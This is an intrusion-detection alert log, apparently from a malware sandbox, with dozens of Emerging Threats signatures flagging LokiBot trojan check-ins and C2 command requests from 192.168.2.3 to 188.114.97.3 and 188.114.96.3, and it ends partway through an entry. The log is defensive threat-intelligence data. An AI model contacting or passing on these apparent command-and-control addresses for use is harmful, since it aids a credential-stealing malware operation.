ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349747802825766 08/11/22-06:42:18.537201
SID:	2825766
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349798802025381 08/11/22-06:43:06.576803
SID:	2025381
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349888802025381 08/11/22-06:44:00.133246
SID:	2025381
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349792802024318 08/11/22-06:42:59.404301
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349797802021641 08/11/22-06:43:05.379365
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349895802024313 08/11/22-06:44:06.157277
SID:	2024313
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349754802021641 08/11/22-06:42:26.308314
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349852802024313 08/11/22-06:43:38.361573
SID:	2024313
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349785802024318 08/11/22-06:42:51.879415
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349794802021641 08/11/22-06:43:01.964847
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349884802024318 08/11/22-06:43:54.330408
SID:	2024318
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349755802021641 08/11/22-06:42:27.395952
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349892802021641 08/11/22-06:44:04.916628
SID:	2021641
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349792802024313 08/11/22-06:42:59.404301
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349753802825766 08/11/22-06:42:25.207102
SID:	2825766
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349757802024313 08/11/22-06:42:29.610436
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349785802024313 08/11/22-06:42:51.879415
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349782802024313 08/11/22-06:42:50.570997
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349805802025381 08/11/22-06:43:09.287221
SID:	2025381
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349867802021641 08/11/22-06:43:45.824252
SID:	2021641
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349786802825766 08/11/22-06:42:53.219319
SID:	2825766
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349782802024318 08/11/22-06:42:50.570997
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349788802021641 08/11/22-06:42:54.331478
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349743802025381 08/11/22-06:42:14.045456
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349881802825766 08/11/22-06:43:50.015660
SID:	2825766
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 188.114.97.3 - Destination IP: 192.168.2.3

Timestamp:	188.114.97.3192.168.2.380497852025483 08/11/22-06:42:51.983930
SID:	2025483
Source Port:	80
Destination Port:	49785
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349756802024318 08/11/22-06:42:28.447484
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349793802024313 08/11/22-06:43:00.645450
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349744802825766 08/11/22-06:42:15.052087
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349746802024318 08/11/22-06:42:17.452589
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349791802021641 08/11/22-06:42:58.117986
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349793802024318 08/11/22-06:43:00.645450
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349885802825766 08/11/22-06:43:55.376397
SID:	2825766
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349823802825766 08/11/22-06:43:13.321407
SID:	2825766
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349897802024318 08/11/22-06:44:08.828123
SID:	2024318
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349830802025381 08/11/22-06:43:16.837786
SID:	2025381
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349853802825766 08/11/22-06:43:40.660156
SID:	2825766
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349884802024313 08/11/22-06:43:54.330408
SID:	2024313
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349852802024318 08/11/22-06:43:38.361573
SID:	2024318
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349757802024318 08/11/22-06:42:29.610436
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349817802825766 08/11/22-06:43:11.901228
SID:	2825766
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349758802825766 08/11/22-06:42:30.656105
SID:	2825766
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349889802025381 08/11/22-06:44:01.764745
SID:	2025381
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349828802021641 08/11/22-06:43:14.503252
SID:	2021641
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349751802021641 08/11/22-06:42:22.964431
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349786802021641 08/11/22-06:42:53.219319
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349811802024318 08/11/22-06:43:10.662100
SID:	2024318
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349898802024313 08/11/22-06:44:09.907279
SID:	2024313
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349805802021641 08/11/22-06:43:09.287221
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349817802024313 08/11/22-06:43:11.901228
SID:	2024313
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349828802825766 08/11/22-06:43:14.503252
SID:	2825766
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349817802024318 08/11/22-06:43:11.901228
SID:	2024318
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349794802825766 08/11/22-06:43:01.964847
SID:	2825766
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397
SID:	2024313
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407
SID:	2021641
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290
SID:	2021641
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415
SID:	2825766
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240
SID:	2825766
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478
SID:	2025381
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189
SID:	2024313
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595
SID:	2025381
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986
SID:	2025381
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356
SID:	2825766
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950
SID:	2825766
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333
SID:	2825766
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189
SID:	2024318
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252
SID:	2025381
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279
SID:	2025381
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333
SID:	2021641
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356
SID:	2025381
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478
SID:	2825766
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628
SID:	2024318
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277
SID:	2825766
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365
SID:	2024318
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660
SID:	2025381
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240
SID:	2024318
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573
SID:	2025381
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628
SID:	2024313
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881
SID:	2025381
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847
SID:	2024318
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817
SID:	2024313
Source Port:	49764
Destination Port:	80
